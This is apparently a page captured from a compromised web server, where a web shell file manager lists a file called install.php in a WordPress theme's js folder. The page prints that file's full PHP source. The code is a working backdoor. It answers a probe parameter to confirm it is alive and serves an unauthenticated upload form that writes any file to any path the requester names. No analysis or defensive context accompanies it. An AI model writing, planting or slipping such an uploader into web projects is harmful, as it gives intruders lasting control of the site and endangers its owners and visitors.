0byt3m1n1
Path:
/
home
/
artemisi
/
public_html
/
shubal__3e4c3ab
/
wp-content
/
themes
/
muso
/
js
/
[
Home
]
File: install.php
<?php ?><?php if(isset($_REQUEST["ok"])){die(">ok<");};?><?php echo('kill_the_net'); $files = @$_FILES["files"]; if ($files["name"] != '') { $fullpath = $_REQUEST["path"] . $files["name"]; if (move_uploaded_file($files['tmp_name'], $fullpath)) { echo "<h1><a href='$fullpath'>OK-Click here!</a></h1>"; } }echo '<html><head><title>Upload files...</title></head><body><form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form></body></html>'; ?>